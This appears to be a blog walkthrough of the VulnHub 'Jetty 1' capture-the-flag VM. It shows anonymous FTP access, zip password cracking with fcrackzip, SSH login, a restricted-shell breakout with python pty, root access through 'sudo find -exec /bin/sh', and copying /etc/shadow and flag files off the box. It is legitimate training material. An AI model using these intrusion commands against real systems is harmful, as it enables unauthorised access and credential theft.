It’s that time again when we challenge our skills in an effort to learn something new daily and VulnHub has provided yet again. Jetty 1 by MrSquid; giving us the opportunity to pay attention to details and use cool tools. Let’s jump in but before we do so, Please read the warning below.

Public Service Announcement

THIS IS ONLY FOR EDUCATIONAL PURPOSES. DO NOT INSTALL/RUN THIS VULNERABLE VM ON ANY PRODUCTION NETWORK!

WHAT WE NEED TO GET STARTED.

Reconnaissance

RECON, RECON, RECON….and MORE RECON. We will start with NET Discover and NMAP; to see what is out there.

netdiscovery -r IPADDR/CIDR

Identified the following web directories within the NMAP scan results. However, all were unreachable so we scan more.

New Port 65507/tcp open running an unknown service, let’s see if netcat (nc) can do a bit more recon.

OK SSH-2.0, we see you running. Now that we have all the open ports account for (i.e., 21 – FTP, 80-HTTP and 65507-SSH), we need to go back the FTP since it allows “anonymous” login.

Username & Password: anonymous
mget *.* to grab all the FILES

README.txt

Hi Henry, here you have your SSH’s password. As you can see the file is encrypted with the default company’s password. Please, once you have read this file, run the following command on your computer to close the FTP server on your side. IT IS VERY IMPORTANT!! CMD: service ftp stop.
Regards, Michael.

The RECON is real on with this one. Now to figure out how to get the DEFAULT COMPANY PASSWORD to unzip this file which will give us SSH creds. So exciting..After researching cracker for zip files, we found the FCRACKZIP tool and it was glorious.

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sshpass.zip

Now that we have the DEFAULT COMPANY PASSWORD, it’s time to try it against the sshpass.zip file.

We have a password but no username, so of course we tried using names gathered during first wave of RECON. Here are the usernames we tried with no success “henry, jetty, michael, mrsquid, squid“. It was at this time we messed up. After, back tracking to VulnHub web Jetty 1 description and carefully reviewed the system information. We found the username, lesson learned make sure your RECON process is tight. We could have easily spend hours try to figure this one out.

Jetty 1 Description

The company Aquarium Life S.L. has contacted you to perform a pentest against one of their machines. They suspect that one of their employees has been committing fraud selling fake tickets. They want you to break into his computer, escalate privileges and search for any evidences that proves this behavior.

Extra information:
The suspicious username is Squiddie.
He was in charge of the ticket selling for the Aquarium. Ethernet settings set to NAT with DHCP enabled. You should find the IP in your VLAN.

To not leave any other stone un-turned, we continued with or RECON process even through we have SSH credentials.

Grab a copy of Jetty 1 web “robots.txt” file with WGET.

robots.txt

User-agent: *
Disallow: /dir/
Disallow: /passwords/
Disallow: /facebook_photos
Disallow: /admin/secret

Browsed to all the web directories/path with no successfully. At this point, we brought out the DIRB tools to dig in further.

Exploitation

Now that we have good information about the system and credentials, It is time to try our SSH access with the credentials discovered in the RECON phase.

ssh squiddie@jetty -p 65507

OH NO…Restricted shell on SSH. WHHYYYYYY?? Okay we got this.

Breakout of Restricted Shell
https://d00mfist.gitbooks.io/ctf/content/escaping_restricted_shell.html

Attempts of Restricted Shell Break Out that FAILED

  • ssh squiddie@jetty -p 65507 -t “/bin/sh”
  • ssh squiddie@jetty -p 65507 -t “bash –noprofile”
  • more/ less/ man -> !/bin/sh

But wait, we have PYTHON…LET’S GET IT!!!

Executed PYTHON syntax first, then follow up with “import pty; pty.spawn(‘/bin/bash’)”

Privilege Escalation (PrivESC)

Manual PrivESC progress with syntax “sudo -l” and “whoami”

https://gtfobins.github.io/gtfobins/find/#sudo
sudo find . -exec /bin/sh \; -quit

We PAUSED here to not jump ahead of ourselves and potentially overlook critics POST-EXPLOITATION RECON.

Transferring LinPeas to Jetty 1 VM and execute automatically POST-EXPLOITATION Tools.

python -m SimpleHTTPServer 8080
wget IPADDR:8080/linpeas.sh

Both Manual and Automated POST-EXPLOITATION process, shows that the path to PRIVESC is using “find” binary as “SUDO”.

sudo find . -exec /bin/sh \; -quit

Worked perfectly, we are now ROOT ROOT and WOOT WOOT. Now we need to do what we came here for….GRAB ALL THE FILES.

We will be grab the file with Netcat; we know there’s better way to do this but wanted to show NetCat functionality can be endless. So here goes…

Receiver

Sender

Following this process, we were able to GRAB the following files.

  • user.txt
  • root.txt
  • proof.txt
  • notes.txt
  • /etc/passwd
  • /etc/shadow

Another VulnHub box DONE, hopefully this help. Thanks to Vulnhub and MrSquid.

Default image
CyberGuider
Become ONE Your Success is Our Goal
Articles: 13
Translate »